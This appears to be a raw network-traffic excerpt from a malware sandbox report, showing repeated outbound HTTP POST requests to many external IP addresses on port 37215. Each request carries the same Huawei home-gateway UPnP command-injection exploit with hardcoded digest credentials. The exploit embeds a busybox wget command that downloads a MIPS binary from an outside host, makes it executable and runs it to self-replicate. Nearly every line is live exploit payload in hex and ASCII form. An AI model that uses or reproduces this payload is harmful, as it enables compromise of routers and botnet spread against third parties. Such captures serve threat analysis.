6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  350192.168.2.1358246157.158.205.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231034994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  351192.168.2.1348306157.97.211.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231055975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  352192.168.2.1339314135.94.217.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231080055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  353192.168.2.133494070.81.193.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231100082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  354192.168.2.1348876197.82.114.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231118917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  355192.168.2.133397441.255.204.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231141090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  356192.168.2.1342994197.103.244.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231177092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  357192.168.2.135852835.245.56.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231180906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  358192.168.2.1353096197.112.46.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231220961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  359192.168.2.1339180103.232.80.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231224060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  360192.168.2.134283664.247.228.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231242895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
